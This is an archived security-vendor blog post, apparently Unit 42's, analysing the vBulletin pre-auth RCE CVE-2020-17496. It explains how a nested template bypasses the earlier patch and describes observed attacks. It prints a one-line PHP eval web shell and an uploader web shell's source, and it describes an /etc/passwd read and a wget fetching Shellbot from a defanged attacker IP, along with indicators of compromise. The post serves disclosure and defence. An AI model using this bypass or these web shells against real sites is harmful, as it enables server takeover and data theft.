{
	"id": "d1b13c08-0e5f-44d5-a709-aafc13f2dc21",
	"created_at": "2026-04-06T00:14:02.448002Z",
	"updated_at": "2026-04-10T13:12:02.708137Z",
	"deleted_at": null,
	"sha1_hash": "4e74e65d19e675497fb8b4e587b787f9abdbf362",
	"title": "Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2020-17496",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2654343,
	"plain_text": "Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability\r\nCVE-2020-17496\r\nBy Haozhe Zhang, Qi Deng, Zhibin Zhang, Ruchna Nigam\r\nPublished: 2020-09-03 · Archived: 2026-04-05 21:40:31 UTC\r\n \r\nExecutive Summary\r\nIn September 2019, a remote code execution (RCE) vulnerability identified as CVE-2019-16759 was disclosed for\r\nvBulletin, a popular forum software. At that time, Unit 42 researchers published a blog on this vBulletin\r\nvulnerability, analyzing its root cause and the exploit we found in the wild. By exploiting this vulnerability, an\r\nattacker could have gained privileged access and control over any vBulletin server running versions 5.0.0 up to\r\n5.5.4, and potentially lock organizations out from their own sites.\r\nRecently, Unit 42 researchers found exploits in the wild leveraging the vBulletin pre-auth RCE vulnerability CVE-2020-17496. The exploits are a bypass of the fix for the previous vulnerability, CVE-2019-16759, which allows\r\nattackers to send a crafted HTTP request with a specified template name and malicious PHP code, and leads to\r\nremote code execution. More than 100,000 sites are built on vBulletin, including the forums of major enterprises\r\nand organizations, so it’s imperative to patch immediately.\r\nIn this blog, we provide details on the bypass of the patch of the vulnerability, proof of concept code (PoC) to\r\ndemonstrate the vulnerability and information on attacks we have observed in the wild.\r\nPalo Alto Networks customers are protected by the following services and products via Threat Prevention\r\nsignatures and URL Filtering blocks the related C2 traffic.\r\nRoot Cause Analysis of the Vulnerability (CVE-2020-17496)\r\nTemplate rendering is a functionality of vBulletin that can convert XML templates to PHP code and execute it.\r\nBeginning from version 5.0, vBulletin starts to accept Ajax requests for template rendering. The rendering is\r\nexecuted with a function staticRenderAjax. As shown in Figure 1, the values of parameters for this function are\r\nfrom $_REQUESTS, $_GET and $_POST. Thus, the template name and the related config which come from those\r\nparameters are user-controllable, which leads to the RCE vulnerability CVE-2019-16759.\r\nhttps://unit42.paloaltonetworks.com/cve-2020-17496/\r\nPage 1 of 17\n\nFigure 1. The callRender() in vBulletin \u003c 5.5.5\r\nWhen an attacker manipulates an Ajax request that contains template name widget_php and malicious code placed\r\nin the parameter widgetConfig[‘code’], the render engine will convert the XML template widget_php shown in\r\nFigure 2 to a string of PHP code, then execute the code by the eval function highlighted in Figure 3. Since the\r\ngenerated code has a line of vB5_Template_Runtime::evalPhp('' . $widgetConfig['code'], the malicious code in the\r\nrequest will be executed.\r\nFigure 2. Template “widget_php”\r\n1\r\n2\r\n3\r\n4\r\n5\r\n$final_rendered = '' . '';\r\nif (empty($widgetConfig) AND !empty($widgetinstanceid))\r\n{\r\n$final_rendered .= ' ' . ''; $widgetConfig = vB5_Template_Runtime::parseData('widget', 'fetchConfig',\r\n$widgetinstanceid);\r\nhttps://unit42.paloaltonetworks.com/cve-2020-17496/\r\nPage 2 of 17\n\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n$final_rendered .= '' . ' ';\r\n}\r\nelse {\r\n$final_rendered .= '';\r\n}\r\n$final_rendered .= '' . ' ' . '';\r\nif (!empty($widgetConfig))\r\n{\r\n$final_rendered .= ' ' . '';\r\n$widgetid = $widgetConfig['widgetid'];\r\n$final_rendered .= '' . ' ' . '';\r\n$widgetinstanceid = $widgetConfig['widgetinstanceid'];\r\n$final_rendered .= '' . ' ';\r\n}\r\nelse\r\n{\r\n$final_rendered .= '';\r\n}\r\n$final_rendered .= '' . ' ' . vB5_Template_Runtime::includeTemplate('module_title',array('widgetConfig'\r\n=\u003e $widgetConfig, 'show_title_divider' =\u003e '1', 'can_use_sitebuilder' =\u003e $user['can_use_sitebuilder'])) . ' '\r\n. '';\r\nif (!empty($widgetConfig['code']) AND !vB::getDatastore()-\u003egetOption('disable_php_rendering'))\r\n{\r\n$final_rendered .= ' ' . '' . ' ' . vB5_Template_Runtime::evalPhp('' . $widgetConfig['code'] . '') . ' ';\r\n}\r\nelse\r\n{\r\nhttps://unit42.paloaltonetworks.com/cve-2020-17496/\r\nPage 3 of 17\n\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\n42\r\n43\r\n44\r\n45\r\n46\r\n47\r\n48\r\n49\r\n50\r\n51\r\n52\r\n53\r\n54\r\n55\r\n56\r\n57\r\n$final_rendered .= ' ' . '';\r\nif ($user['can_use_sitebuilder'])\r\n{ $final_rendered .= ' ' . vB5_Template_Runtime::parsePhrase(\"click_edit_to_config_module\") . ' ';\r\n}\r\nelse\r\n{\r\n$final_rendered .= '';\r\n}\r\n$final_rendered .= '' . ' ';\r\n}\r\n$final_rendered .= '' . ' ';\r\nhttps://unit42.paloaltonetworks.com/cve-2020-17496/\r\nPage 4 of 17\n\n58\r\n59\r\n60\r\n61\r\n62\r\n63\r\n64\r\n65\r\n66\r\n67\r\n68\r\n69\r\n70\r\n71\r\n72\r\n73\r\n74\r\n75\r\n76\r\n77\r\n78\r\n79\r\nhttps://unit42.paloaltonetworks.com/cve-2020-17496/\r\nPage 5 of 17\n\nFigure 3. Eval the PHP code rendered from the XML template\r\nBeginning from version 5.5.5, a fix for CVE-2019-16759 was introduced into the function callRender() as shown\r\nin Figure 4. It uses a disallow-list mechanism to check the template name. If the name is widget_php, the engine\r\nwon’t render the requested template.\r\nhttps://unit42.paloaltonetworks.com/cve-2020-17496/\r\nPage 6 of 17\n\nFigure 4. The callRender() in vBulletin ≥ 5.5.5\r\nAnother fix is that the evalPhp function will check the current template name. After the fix, widget_php is the only\r\ntemplate that can be used to execute PHP code, as shown in Figure 5.\r\nFigure 5. evalPhp() executes code only when the template is widget_php\r\nhttps://unit42.paloaltonetworks.com/cve-2020-17496/\r\nPage 7 of 17\n\nThe fix makes widget_php the only template that can be utilized for PHP code execution, and meanwhile, restricts\r\nthe user’s access to this template. However, in the latest bypass, we found that another template can be utilized to\r\nload this template. That template is widget_tabbedcontainer_tab_panel.\r\nFigure 6. The template widget_tabbedcontainer_tab_panel\r\nThis template widget_tabbedcontainer_tab_panel shown in Figure 6, above, is a template that can be used to\r\nrender multiple child templates. Rendering the template itself doesn’t directly lead to the remote code execution.\r\nHowever, the rendering of this template will trigger the rendering of other child templates.\r\nThe code below is the PHP code that is rendered from the widget_tabbedcontainer_tab_panel template in XML.\r\nAfter this code is generated, it will be executed.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n$final_rendered = '' . '';\r\n$panel_id = '' . vB5_Template_Runtime::vBVar($id_prefix).vB5_Template_Runtime::vBVar($tab_num)\r\n. '';\r\n$final_rendered .= '' . '' . '' . ' ' . '';\r\nif (isset($subWidgets) AND (is_array($subWidgets) OR $subWidgets instanceof ArrayAccess))\r\n{\r\nforeach ($subWidgets AS $subWidget)\r\n{\r\n$final_rendered .= ' ' .\r\nvB5_Template_Runtime::includeTemplate($subWidget['template'],array('widgetConfig' =\u003e\r\n$subWidget['config'], 'widgetinstanceid' =\u003e $subWidget['widgetinstanceid'], 'widgettitle' =\u003e\r\n$subWidget['title'], 'tabbedContainerSubModules' =\u003e $subWidget['tabbedContainerSubModules'],\r\n'product' =\u003e $subWidget['product'])) . ' ';\r\n}\r\nhttps://unit42.paloaltonetworks.com/cve-2020-17496/\r\nPage 8 of 17\n\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n}$final_rendered .= '' . '’;\r\nIn the PHP code, it can be seen that the render engine will traverse the “subWidget” and its config from the\r\n$subWidgets and create a new template object, after which the rendering will generate its PHP code. In this case,\r\nif the string widget_php is assigned to variable subWidget and the malicious code is placed in the\r\n$widgetConfig['code'], the malicious code will be executed just like with CVE-2019-16759.\r\nProof of Concept\r\nBased on our analysis, we can construct the exploit code to prove the functionality. The calling of the function\r\ncallRender requires the POST HTTP method (according to Figure 7).\r\nFigure 7. Call of the callRender()\r\nFigure 8 shows a compromised page that contains the result of the code phpinfo(); with the request information.\r\nFigures 9 and 10 show some other manipulated requests that have the same effect.\r\nIn the URL, the child template name widget_php and the malicious code phpinfo();exit(); are in the array\r\nsubWidget as the first element. When the backend processes this URL, the malicious code will be executed.\r\nhttps://unit42.paloaltonetworks.com/cve-2020-17496/\r\nPage 9 of 17\n\nFigure 8. Reproduction of the exploit – 1\r\nFigure 9. Reproduction of the exploit – 2\r\nFigure 10. Reproduction of the exploit – 3\r\nExploits in the Wild: CVE-2020-17496\r\nWe caught the first incident of CVE-2020-17496 exploitation on Aug. 10, 2020, and later found that exploitation\r\nattempts from different IP addresses are ongoing. Note that these are disparate attacks and not a coordinated effort\r\nby any particular attackers.\r\nhttps://unit42.paloaltonetworks.com/cve-2020-17496/\r\nPage 10 of 17\n\nScanning Activities\r\nAccording to malicious traffic we captured, there are multiple source IPs running scans. These scans are trying to\r\nfind vulnerable sites and collect that information, which is an early step of cyber attacks. The traffic is shown in\r\nFigures 11-15. These payloads try to execute system commands echo and id, which can give attackers knowledge\r\nof whether or not the targets are vulnerable according to the responses.\r\nFigure 11. Exploit in the wild – 1\r\nFigure 12. Exploit in the wild – 2\r\nFigure 13. Exploit in the wild – 3\r\nFigure 14. Exploit in the wild – 4\r\nSensitive File Reading\r\nSome attackers are trying to exploit the vulnerability and read files on the server-side. The payload contains the\r\nPHP function shell_exec() for the execution of arbitrary system commands and a system command cat\r\n../../../../../../../../../../etc/passwd to read the content of the /etc/passwd. The traffic is shown in Figure 15. Once the\r\nattack succeeds, sensitive information from the targets may be disclosed.\r\nhttps://unit42.paloaltonetworks.com/cve-2020-17496/\r\nPage 11 of 17\n\nFigure 15. Exploit in the wild – 5\nWriting Web Shell\nSome attackers are exploiting the vulnerability to install a web shell.\nFigure 16 shows that the exploit is trying to write a PHP-based web shell ?php @eval($_POST[“x”]);?\u003e to the\nfile conf.php on the web host directory with the PHP function file_put_content(). Once the attack succeeds,\nattackers can send their commands via HTTP POST request with the parameter x to the web shell and execute the\ncommands on the server-side.\nFigure 16. Exploit in the wild – 6\nFigure 17 shows that the exploit is trying to download a PHP script onto the victim server. The webshell code is as\nbelow. The code provides an upload page for attackers to upload any files and conduct the follow-up steps of a\ncyber attack.\n1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n11\n?php\nerror_reporting(0);\necho \"Jasmine  \n\";\necho\"\".php_uname().\"\";\nprint \"\\n\";$disable_functions = @ini_get(\"disable_functions\");\necho \"  \nDisablePHP=\".$disable_functions; print \"\\n\";\necho\"\n\n\";\necho\"  \n\";\nif($_POST[\"k\"]==upload){\nif(@copy($_FILES[\"f\"][\"tmp_name\"],$_FILES[\"f\"][\"name\"])){\necho\"**\".$_FILES[\"f\"][\"name\"];\nhttps://unit42.paloaltonetworks.com/cve-2020-17496/\nPage 12 of 17**\n\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n}else{\r\necho\"\u003cb\u003eGagal upload cok\";\r\n}\r\n}\r\n?\u003e\r\nFigure 17. Exploit in the wild – 7\r\nhttps://unit42.paloaltonetworks.com/cve-2020-17496/\r\nPage 13 of 17\n\nFigure 18 shows that the exploit is trying to write base64 encoded PHP code into a file in the web host directory.\r\nThe new page will lead to an arbitrary file upload entrypoint, allowing attackers to conduct the follow-up steps of\r\na cyber attack.\r\nFigure 18. Exploit in the wild – 8\r\nDownloading Shellbot\r\nSome attackers are utilizing the vulnerability to download a Perl-based script malware (Shellbot) with the PHP\r\nfunction shell_exec() for the execution of the system command wget from the address\r\nhttp://178[.]170[.]117[.]50/bot1 and run it. The payload can be seen in Figure 19.\r\nFigure 19. Exploit in the wild – 9\r\nOnce the script is executed, it will connect to an IRC-based command-and-control (C2) server with the address of\r\n66[.]7[.]149[.]161:6667, join the IRC channel #afk then keep responding to the PING from the server, as in the\r\ntraffic shown in Figure 20. Once it receives the commands from the chat channel, it will execute the related code\r\nof port scanning, download files, execute system commands, start a flood attack, pop a shell to attackers and so\r\non.\r\nFigure 20. Traffic during the execution of the ShellBot script\r\nDownloading Sora\r\nOne exploit is found to download a Mirai variant (Sora) from the attacker’s server. However, the payload is\r\nineffective as it uses the wrong HTTP method.\r\nhttps://unit42.paloaltonetworks.com/cve-2020-17496/\r\nPage 14 of 17\n\nFigure 21. Exploit in the wild – 10\r\nAccording to analysis of the samples, they spread themselves with different combinations of the exploits of CVE-2020-5902 (which would be ineffective, as the payload uses bash commands, whereas the exploit requires the\r\ninjected commands to be specific CLI-compatible ones), CVE-2020-1937, CVE-2020-10173, CVE-2020-10987,\r\nNetgear R700 RCE, Netlink GPON Router 1.0.11 RCE and the vulnerability CVE-2020-17496 discussed in this\r\nblog.\r\nConclusion\r\nThere are multiple kinds of exploit attempts against vBulletin pre-auth RCE vulnerability CVE-2020-17496 being\r\ndetected by our threat platform. As a widely used forum software package that has been running for a long time in\r\nthe market, it has been identified as a prized target by attackers.\r\nvBulletin released the patch to fix this vulnerability on Aug. 10, 2020. Applying the patch to the latest version will\r\nmitigate the risks, which is strongly advised.\r\nPalo Alto Networks customers are protected by the following services and products:\r\nThreat Prevention Signature 59133 and 80671.\r\nURL Filtering blocks the related C2 traffic of the Shellbot.\r\nIndicators of Compromise\r\nShellbot Hash\r\n88DDD8A1B77477AAFFD1BB163B9770D72A77BF29BFCA226E79C28D15BEF983ED\r\nMirai Variant (Sora) Hashes\r\n03bfec4e039805091fe30fa978d5ec7f28431bb0fca4b137e075257b3e1c0dd4\r\nb4cb04709f613b5363514e75984084ef1d3eaba7c50638b2a5a284680831b992\r\n94f02ea10b4546da71bd46916f0fe260b40c8ed4deccf0588687e62ca3819ad7\r\nbd72be4f7d64795b902f352e47b1654eaee6b5a71cddfaf2c245dba1b2d602eb\r\n77b4f7f0d66a0333d756116eaae567a8540392f558c49d507bf6da10bd047fe3\r\n051baaabf205c7c0f5fd455ac5775447f9f3df0cc9bc5f66f6d386f368520581\r\nfd63b9c7e9dce51348d9600f67139ea8959fdbbca84d505b5e9317bbdca74016\r\nhttps://unit42.paloaltonetworks.com/cve-2020-17496/\r\nPage 15 of 17\n\n8b5810e07cf21ebb1c2ff23c13ce88022c1dd5bc2df32f4d7e5480b4ddb82de2\r\nded23c3f5f2950257d8cfb215c40d5f54b28fde23c02f61ce1eb746843f43397\r\n80fb66c6b1191954c31734355a236b7342dc3fd074ead47f9c1ed465561c6e8c\r\nf30bb52c0e32dfe524fc0dfda1724a1ffb88647c39c33a66dfd66109fecceec7\r\n1900e09983acf7ddc658b860be7875a527bc914cbffcf0aaff0b4182ecef047b\r\nfa7575bd0cd2a83995ea34d8d008eb07c2062a843e5e155e2e0d8b35a0cf7901\r\n68132010d9a543a6a2a9ea61e771cf2c041cea259cc76affdfe663e20c130a45\r\nab671fc0c68ed1c249c2bb52b28ae3d70df8bd1614d86f6d6a3f4c21d7841d72\r\n4ff21e69b11566336f4fd56ac2829cdcf215182e8ff807f8e744c0a2b08f726f\r\na7373fa18b367edbcd4462345a5da087821e34734bdf05d1c4060a7694868c5e\r\ndec56b06e03665d2c656b530d3b6f90ca0ec2925bec4559d8a2cec5da3a7700b\r\nc379139347470254f19041f05e19f5454750e052f04f6d377ec8df19ce959519\r\nfed0f0d3e9d990f8a83b86d29e586d46e7cac54efb0eae2f07112d61afb9b885\r\n84448ee487010d6fed918febe230b71a8ec1266e300f85933014db2566645857\r\n994889422b24a5b4759eda30265f1b933a458e15927b4f7949d4a3ba79eb43ca\r\n39b6d72101adae2b71815328599f8e67ee27955849dfb3825c5b2731d504696b\r\n0747988a77c89c1267a882b663fbd4168e25aed239fb1553e65bb4ac74ecda67\r\n99d06d1c82af244b1533c1173ca10da7f29bfbf753073f20f5dc7a0016152a4c\r\n372ab5c1c23d198b594353239a96d6cf620cc56588f5fdf5dfb32919dd019020\r\nef2a6b37568e14dacd5d8894ce2e4bbc593ffd58e197827a052d2c2f0a756949\r\n1cf9ac9150d59de25ca5ac1f855fadf1b03f13b4e9ced63a12acef9c8292a648\r\ncf172b4629e321e4c78a1d0717130bbb693392712a86d3d85d035bae1f377dbd\r\n1a0293d4863ccef36e138e4f6c65ad013a403db0ffc69ebaf04b43b61b4ba798\r\n2a14b9b01ec78a332be40339a782a2cf2bf9a237eee9cc5fcd40fa3385b1d4fb\r\nf56150ff764328ee59eeaafe5e2d63574b475a69386c9ac4978006070807edc9\r\n9572a532c08f81d7957ffd4639f95c34a2085f119fa426d8ea911af72bfd0b4a\r\nhttps://unit42.paloaltonetworks.com/cve-2020-17496/\r\nPage 16 of 17\n\n113ad91a1aab3abcd704fe8670fbc043f049586462a4c58dabdd44c14519ea66\r\nf9d7d9b11c60bd52625e7d9a33516c2bac96ac542a22696d0da3a9c536dae11b\r\n6f01ef6670ecd79f9b322dd8521bc13a73037e7f84fa9aad35d11d964d8f9e60\r\n2960748648bc2cd1b3db5e1e1ce9931a6588d65ae91c6d09e6b8bf2d78b00263\r\nIP Addresses\r\n66[.]7[.]149[.]161\r\n178[.]170[.]117[.]50\r\nSource: https://unit42.paloaltonetworks.com/cve-2020-17496/\r\nhttps://unit42.paloaltonetworks.com/cve-2020-17496/\r\nPage 17 of 17",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/cve-2020-17496/"
	],
	"report_names": [
		"cve-2020-17496"
	],
	"threat_actors": [],
	"ts_created_at": 1775434442,
	"ts_updated_at": 1775826722,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4e74e65d19e675497fb8b4e587b787f9abdbf362.pdf",
		"text": "https://archive.orkl.eu/4e74e65d19e675497fb8b4e587b787f9abdbf362.txt",
		"img": "https://archive.orkl.eu/4e74e65d19e675497fb8b4e587b787f9abdbf362.jpg"
	}
}